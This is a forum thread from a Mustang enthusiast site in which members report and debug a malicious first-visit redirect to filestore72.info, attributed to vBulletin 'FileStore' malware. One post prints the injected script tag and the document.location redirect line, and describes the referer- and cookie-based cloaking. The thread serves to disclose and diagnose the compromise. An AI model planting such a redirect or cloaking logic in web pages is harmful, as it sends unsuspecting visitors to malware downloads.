Sponsored
TricarboNate
Well-Known Member
Ok, glad I'm not the only one getting this! Seems to only happen on my Android phone though.
Please check into your forum, it looks to be infected with FileStore malware. Filestore malware is a vBulletin specific infection, caused by one of your plugins.
https://club.myce.com/t/vbulletin-myfilestore-hack-find-the-traces-and-remove-them/304794
Please check into your forum, it looks to be infected with FileStore malware. Filestore malware is a vBulletin specific infection, caused by one of your plugins.
https://club.myce.com/t/vbulletin-myfilestore-hack-find-the-traces-and-remove-them/304794
..::Ryan::..
Well-Known Member
- Joined
- Jan 16, 2015
- Threads
- 7
- Messages
- 120
- Reaction score
- 18
- Location
- United States
- Vehicle(s)
- 2015 Mustang GT - Magnetic
I've noticed it when I browse to Mustang6G following a link from Facebook. So if I click a link in a Facebook group for Mustang6G, it will redirect to a third-party FileShare.info (I believe). If I click back, and click the link again, it will load Mustang6G fine.
This happens when I click a link from my iPhone or from my laptop. The link got blocked by my proxy, but it is trying to take me to hxxp://filestore72.info/download.php?id=1498c470
(replace x with t)
This happens when I click a link from my iPhone or from my laptop. The link got blocked by my proxy, but it is trying to take me to hxxp://filestore72.info/download.php?id=1498c470
(replace x with t)
- Joined
- Feb 17, 2014
- Threads
- 156
- Messages
- 11,845
- Reaction score
- 4,237
- Location
- S550 INTERIOR DRESS UP
- Website
- www.ebay.com
- Vehicle(s)
- 03' Cobra, 05' GT, 13' GT, 15' GT
Yes, when I unsubscribe to a thread.
68fbjjz109
Well-Known Member
Same problem when I used to click links on my email on my phone.
Sponsored
Spart
Well-Known Member
Getting this when I click on a link first time only from Facebook. If I close and click again it works correctly. Happening in Chrome on both my Windows PC and my Android phone.
68fbjjz109
Well-Known Member
I am getting this, when I click on thread links from my android phone.
Spart
Well-Known Member
Did my own debugging and this is 100% on Mustang6G.com's end.
When a particular link loads up for the *first time*, a document.location redirect is being issued. Whatever this is appears to use cookies to detect that you've visited that link before, so it opens the site normally. I assume this is to avoid detection.
So in my debugging, there is this line in the <head>
Which loads this
STEPS TO REPRODUCE:
When a particular link loads up for the *first time*, a document.location redirect is being issued. Whatever this is appears to use cookies to detect that you've visited that link before, so it opens the site normally. I assume this is to avoid detection.
So in my debugging, there is this line in the <head>
Code:
<script type="text/javascript" src="http://www.mustang6g.com/forums/misc.php?v=388&js=js"></script>
Code:
document.location='http://filestore72.info/download.php?id=1498c470'- Open this link in Incognito mode. Ensure all Incognito windows are closed before doing this: https://www.facebook.com/carbondynamicss/posts/1664507543825429
- Click the link
- Get redirected
Spart
Well-Known Member
[MENTION=1]Jarstang[/MENTION] it's a little disappointing that this isn't fixed. I used to refer people on S550 FB groups to specific forum threads all the time, but now that I know they're just going to see a malicious link if they've never been to the site before, I've had to stop doing that.
Some additional info: I was correct that whatever this is is using cookies to track whether you've been to the site before cookie (which helps to avoid detection/replication by people who visit the site regularly.)
It seems the cookie it keys in on is bblang_id. If you delete this cookie and then visit the site from any external link, you'll get the redirect. It is interesting to me that after you delete this cookie, if you continue to browse the site through internal links, the cookie is not recreated.
So, whatever this is:
Some more info: https://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info
Whatever this is probably has full database access, and can intercept passwords before they're hashed. So consider your password used on this site to be unsafe to use anywhere else.
Here are some screen shots that should help:
Some additional info: I was correct that whatever this is is using cookies to track whether you've been to the site before cookie (which helps to avoid detection/replication by people who visit the site regularly.)
It seems the cookie it keys in on is bblang_id. If you delete this cookie and then visit the site from any external link, you'll get the redirect. It is interesting to me that after you delete this cookie, if you continue to browse the site through internal links, the cookie is not recreated.
So, whatever this is:
- Is checking HTTP_REFERER
- If the HTTP_REFERER isn't internal, embeds the JS www.mustang6g.com/forums/misc.php?v=388&js=js after
- Creates the bblang_id cookie
Some more info: https://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info
Whatever this is probably has full database access, and can intercept passwords before they're hashed. So consider your password used on this site to be unsafe to use anywhere else.
Here are some screen shots that should help:
Sponsored
N123456
Well-Known Member
- Joined
- Sep 28, 2016
- Threads
- 6
- Messages
- 193
- Reaction score
- 34
- Location
- Columbus, Ohio
- Vehicle(s)
- 2015 Gt Premium
I agree. This thread is now 40+ posts in length with multiple people reporting from multiple devices. This is something that should be seriously looked at and resolved quickly.
NvrFinished
Well-Known Member
Same thing happened to me with my android phone this weekend. I normally access the site via my laptop, but I was on the road to an HPDE and needed to check some emails from M6G. I kept getting the virus link and got frustrated.
This is being actively worked on as we speak. Diagnosing and resolving the issue takes lots of trial and error so it may not be quick, and may require some server downtime soon.
The malware does NOT have access to the site or any user's passwords.
I will provide an update when it is fixed.
The malware does NOT have access to the site or any user's passwords.
I will provide an update when it is fixed.
A few fixes have been implemented.
Can everyone please clear your cookies and let me know if you experience any more issues when clicking on forum links.
Can everyone please clear your cookies and let me know if you experience any more issues when clicking on forum links.
Sponsored